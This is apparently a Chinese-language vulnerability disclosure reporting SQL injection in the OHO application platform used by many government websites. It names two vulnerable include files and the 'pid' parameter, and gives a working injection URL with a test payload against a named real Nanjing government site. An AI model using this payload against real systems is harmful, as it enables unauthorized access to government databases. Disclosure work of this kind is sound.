欧虎开发某系统出现SQL注入漏洞

欧虎开发某系统出现SQL注入漏洞，大批政府网站数据库泄露，数据库root权限。
 

详细说明：

之前发了一个南京国土局的没审核，后来再去搜集信息，发现只要是这个系统的政府网站有include遍历权限的全部存在此问题。
此系统为 OHO全图形化应用系统开发环境
url/include/common/province_city.php
url/include/common/province_city1.php两个文件存在参数过滤不严问题引发注入。
测试注入点：url/include/common/province_city.php?pid=10 当然pid可以为任意值
例如南京国土资源局注入点http://www.njgt.gov.cn/include/common/province_city.php?pid=10
http://www.njgt.gov.cn/include/common/province_city.php?pid=10%20and%200%3C%3E(select%20count(*)%20from%20admin)可返回查询结果